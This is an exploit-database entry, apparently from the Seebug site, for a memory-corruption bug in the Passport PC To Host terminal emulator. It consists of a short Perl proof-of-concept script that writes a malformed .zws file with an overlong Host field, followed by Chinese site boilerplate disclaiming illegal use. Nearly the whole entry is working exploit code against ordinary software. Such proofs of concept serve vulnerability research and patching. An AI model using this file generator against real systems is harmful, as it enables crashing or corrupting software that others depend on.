# Exploit Title: Passport PC To Host Malformed .zws file Memory Corruption # Date: 3-3-12 # Author: Silent Dream # Software Link: http://www.zephyrcorp.com/terminal-emulation/ # Version: Latest (2011-506-S) # Tested on: Windows XP SP3 my $file = "passport_pwn.zws"; my $head = "[Connection]\nHost="; my $junk = "a" x 150; open($File, ">$file"); print $File $head.$junk; close($FILE);
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论